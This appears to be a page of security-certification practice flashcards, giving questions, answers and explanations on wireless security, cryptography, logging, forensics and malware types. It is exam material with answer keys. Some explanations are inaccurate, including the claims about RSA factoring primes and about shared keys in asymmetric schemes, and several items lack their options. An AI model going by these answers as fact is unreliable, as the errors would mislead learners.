MAC filtering Disabled SSID Utilizing a network sniffer (or packet analyzer) can aid an attacker in discerning the SSID of an AP as well as which MAC addresses are being allowed in. By drilling down through the frames of information that are captured, the attacker can easily find the SSID name and, with a little work, can deduce the MAC addresses that have access to the network. Then the person need only spoof the MAC address and connect to the AP's SSID manually to have access to the wireless network. The other answers concern authentication and encryption methods, which will be much more difficult to circumvent. 802.1X is network access control that uses various types of authentication methods including EAP-TLS. WEP and WPA2 are encryption methods, and although WEP is deprecated, it is difficult to get past when used in conjunction with 802.1X.

Which of the following requires a CA during the authentication process?

PEAP-TLS PEAP (Protected Extensible Authentication Protocol) creates a TLS (Transport Layer Security) tunnel by acquiring a PKI certificate from a CA. It is known simply as PEAP or as PEAP-TLS. It is similar to EAP-TTLS. FTPS is FTP over SSL. Explicit mode means that the FTPS client must explicitly request security from the FTPS server. Implicit FTPS connections do not allow negotiation—there is no request for security; it is expected from the server. MD5 is a cryptographic hash function.

Which of the following cloud computing services offers easy-to-configure operating systems?

PaaS Platform as a service (PaaS) is a cloud computing service that offers many software solutions, including easy-to-configure operating systems and on-demand computing. SaaS is software as a service, used to offer solutions such as webmail. IaaS is infrastructure as a service, used for networking and storage. VM stands for virtual machine, which is something that PaaS also offers.

You are logging a server. What security measures should you implement?

Perform hashing of the log files Apply retention policies on the log files You need to retain log files for future analysis. Log files are normally not deleted, and sometimes operating systems will overwrite events in log files after they reach their maximum size. Careful consideration should be taken when configuring log files. Hashing the log files enables people in the future to verify the integrity of those log files and verify that the files have not been tampered with.A cyclic redundancy check (CRC) is an error-detecting code that runs automatically, and isn't really something that would be performed per se. CRCs and collecting temporary files are not necessary when it comes to log files.

Users are required to log in to the network. They use a smart card to do so. Which type of key does the smart card use to log in to the network?

Private key A private key is used by smart cards during login to a network. Often the smart card will be used along with another form of authentication, creating a multifactor authentication scheme. Public keys are used in asymmetric encryption environments. A key is basically one component of a cipher or algorithm. A shared key is often used in public-key environments and asymmetric encryption environments, in which two users share the same key.

Your organization uses VoIP. Which of the following should be performed to increase the availability of IP telephony by prioritizing traffic?

QoS Quality of Service (QoS) should be configured on the router to prioritize traffic, promoting IP telephony traffic to be more available. You'll get some detractors of QoS, especially for the SOHO side of networks, but if used on the right device and configured properly, it can make a difference. This might sound like more of a networking question, but it ties in directly to the CIA triad of security. Data confidentiality and integrity are important, but just as important is availability—the ability for users to access data when required. NAT is network address translation, which interprets internal and external IP networks to each other. NAC is network access control—for example, 802.1X. Subnetting is when a network is divided into multiple logical areas through IP addressing/planning and subnet mask configuring.

Which of the following algorithms depends on the inability to factor large prime numbers?

RSA RSA (Rivest, Shamir, and Adleman) is a public-key cryptography algorithm based on the inability to factor large prime numbers. It is used in many e-commerce scenarios. AES (Advanced Encryption Standard) is based on the substitution-permutation network. Elliptic curve is based on the difficulty of certain mathematical problems that generate keys by graphing specific points on a curve. Diffie-Hellman relies on the secure exchange of keys before data can be transferred.

When creating a public/private key pair, which of the following would an admin need to specify key strength?

RSA RSA is the only cipher listed that deals with private and public keys; it is an asymmetric algorithm. When creating a certificate, the admin needs to specify the underlying algorithm (most likely RSA) and its key strength (most likely 2048-bit or higher). AES and DES are symmetric algorithms—the admin does not select the key strength. SHA is a cryptographic hash function, and again, the admin does not select the key strength. These protocols (and their respective versions) are predetermined in their key length.

Which one of the following is the most common encryption protocol used for key exchange during a secure web session?

RSA The RSA encryption protocol is an asymmetric algorithm used for the key exchange during secure web sessions. Other options for key exchange include Diffie-Hellman and elliptic curve, with or without ephemeral properties.After the key exchange is made, the Advanced Encryption Standard (AES) is used for the transmission of session data. It is a symmetric algorithm that is also used for local data encryption and securing wireless connections. The Secure Hash Algorithm (SHA) is a cryptographic hash function. SHA is commonly used during secure web sessions, and further protects the session. PKI stands for public key infrastructure, the entire set of rules, policies, systems, and users that make secure connections using cipher suites such as TLS and SSL.

A security incident just occurred involving a physical asset (a USB flash drive). Immediately afterward, what should be done first?

Record every person who was in possession of the asset during and after the incident The first thing you want to know is who was in possession of the USB flash drive. This will be important for your chain of custody, in case the asset is used as evidence in a trial. After the incident, continue logging who takes possession of the drive and when.Documentation is important, and in fact, recording each person who was in possession of the drive is a form of documentation. But other documentation such as mitigation methods are not important right away, aside from the fact that mitigation might not have been implemented yet. You don't want to back up the device because that will actually write information to the drive, but you should image it for data preservation purposes. However, this would be done after you document who had possession of the drive.

You are the security administrator for your organization and have just completed a routine server audit. You did not notice any abnormal activity. However, another network security analyst finds connections to unauthorized ports from outside the organization's network. Using security tools, the analyst finds hidden processes that are running on the server. Which of the following has most likely been installed on the server?

Rootkit Most likely, a rootkit was installed. These can evade many routine scans, so there is no fault here. It's just that more in-depth analysis was required to find the rootkit. The hidden processes are the main indicator of the rootkit. Spam is simply harassment by e-mail (and other messaging systems), to put it nicely. A logic bomb is code that defines when a particular type of malware will execute. Ransomware is when a computer is operationally held hostage; files are not retrievable by the user (because they have been encrypted) until a ransom is paid. It's important to run in-depth scans periodically. They can be time consuming, but they can uncover many threats and vulnerabilities that would otherwise go unnoticed.

You need to protect passwords. Which of the following protocols is not recommended because it can supply passwords over the network?

SNMP SNMP (Simple Network Management Protocol) can pass passwords over the network. This can be a security risk and should be avoided if possible. Or at the very least, use the latest version of SNMP, and be careful to protect devices that use SNMP for monitoring, such as switches, UPSs, and so on.DNS (Domain Name System) and ICMP (Internet Control Message Protocol) do not supply passwords over the network. Kerberos can possibly supply passwords over the network, but they will be in an encrypted format and difficult to crack.

You are in charge of auditing resources and the changes made to those resources. Which of the following log files will show any unauthorized changes to those resources?

Security log file The Security log file shows any unauthorized changes to the resources that you decide to audit. These resources can include files, folders, printers, and so on. This can work only if object access auditing has been enabled, and if auditing has been turned on for the resource in question.The System log file logs information pertaining to drivers, operating system files, the kernel, and so on. The Application log file logs information pertaining to applications such as Windows Explorer, File Explorer, the Command Prompt, and third-party applications. The Directory Services log file takes care of logging information pertaining to Active Directory.

An IDS looks for patterns to aid in detecting attacks. What are these patterns known as?

Signatures Signatures are the patterns that an IDS looks for when detecting attacks. This is known as signature-based monitoring and is common to IDS solutions and antivirus programs. Anomalies are detected through the use of anomaly-based monitoring. Viruses and most other types of malware have a specific signature. As long as the signature-based monitoring system has the signature within its database, the virus or other malware should be detected. If the virus is brand new and the signature-based monitoring system has not been updated and does not have the signature of the new virus within its database, the virus just might wreak havoc.

Which of the following needs to be backed up on a domain controller to recover Active Directory?

System State The System State needs to be backed up on a domain controller to recover the Active Directory database in the future. The System State includes user data and system files but does not include the entire operating system. If a server fails, the operating system would have to be reinstalled, and then the System State would need to be restored. Consider backing up the system state in the command-line—see the following TechNet link for more: https://technet.microsoft.com/en-us/library/cc753201(v=ws.11).aspx.

Analyze the following network traffic logs depicting communications between Computer1 and Computer2 on opposite sides of a router. The information was captured by the computer with the IPv4 address 10.254.254.10.

The router implements NAT. The only one of the listed answers that you can infer from the log is that the router implements network address translation (NAT). You can tell this from the first line of the log, which shows the inside of the router using the 192.168.1.1 IP address and the outside using 10.254.254.1. NAT is occurring between the two at the router. This allows the IP 192.168.1.105 to communicate with 10.254.254.10 ultimately. However, the rest of the logs only show the first step of that communication between 10.254.254.10 and the router at 10.254.254.1.What's really happening here? The router is showing that port 3030 is being used on 10.254.254.1. That is the port used by an online game known as netPanzer as well as a mass-e-mailing backdoor worm. The client (10.254.254.10) is using port 80 to make a web-based connection to the game. You can see the three-way TCP handshake occurring with the SYN, SYN/ACK, and ACK packets. Ultimately, 10.254.254.10 is communicating with 192.168.1.105, but we only see the first stage of that communication to the router. As a security analyst you would most likely want to shut down the use of port 3030, so that employees can be more productive and you have less overall chance of a network breach.As far as the incorrect answers, the router definitely is not filtering out port 80, as traffic is successfully being sent on that port. 192.168.1.105 is not a web server; it is most likely used for other purposes. Finally, even though port 80 is used by the client computer, there is likely no web server in this scenario.

You are implementing a testing environment for the development team. They use several virtual servers to test their applications. One of these applications requires that the servers communicate with each other. However, to keep this network safe and private, you do not want it to be routable to the firewall. What is the best method to accomplish this?

Use a virtual switch The virtual switch is the best option. This virtual device will connect the virtual servers together without being routable to the firewall (by default). Removing the virtual network from the routing table is another possibility; but if you have not created a virtual switch yet, it should not be necessary. A physical standalone switch won't be able to connect the virtual servers together; a virtual switch (or individual virtual connections) is required. Creating a VLAN would also require a physical switch. In that scenario, you can have multiple virtual LANs each containing physical computers (not virtual computers), and each working off of the same physical switch. That answer would keep the VLAN from being routable to the firewall, but not virtual servers.

A hacker develops a piece of malicious code that is not designed to automatically spread from one system to another. Instead, it is designed to spread from one file to another file on the individual computer. What type of malware is this?

Virus A virus is designed to spread from one file to another file on an individual computer. It is not designed to automatically spread from one system to another; that would be a worm.A Trojan is malicious code that appears to do something legitimate but does something illegitimate outside the view of the user. A botnet is a group of compromised computers normally known as zombies.

Which of the following is the best description of a security advantage when using a standardized server image?

Which of the following is the best description of a security advantage when using a standardized server image? Organizations develop standardized images for their server operating systems. They are standardized according to organizational policy. So, any mandated security configurations should be applied to the OS before it is made into an image to be used on the network. Unfortunately, that only gets the OS image to a certain point in time. Any new AV definitions, security updates to the OS, and so on, will need to be applied afterward according to organizational policy. OS licensing trackability should not change. Whether you track your OS licenses on paper or with a scanning program, they should be tracked in the same manner as with physical operating systems.

Dan is a network administrator. One day he notices that his DHCP server is flooded with information. He analyzes it and finds that the information is coming from more than 50 computers on the network. Which of the following is the most likely reason?

Worm A worm is most likely the reason that the server is being bombarded with information by the clients; perhaps it is perpetuated by a botnet. Because worms self-replicate, the damage can quickly become critical.

Which of the following computer security threats can be updated automatically and remotely? (Select the best answer.)

Zombie Zombies (also known as zombie computers) are systems that have been compromised without the knowledge of the owner. A prerequisite is the computer must be connected to the Internet so that the hacker or malicious attack can make its way to the computer and be controlled remotely. Multiple zombies working in concert often form a botnet. See the section "Delivery of Malware" earlier in this lesson for more information.


Related study sets

Chapter 11 Auditing the Purchasing Process

View Set

Exam #3: Renal Extra Questions to Review-Done**

View Set

prop & cas ch 15. AR PC state laws

View Set

Microeconomics Final Exam Questions (Chapter 16)

View Set

Maternity and Newborn Health "Antepartum" 58 Questions

View Set

ISDS 3115 Ch. 3 study plan (concept questions)

View Set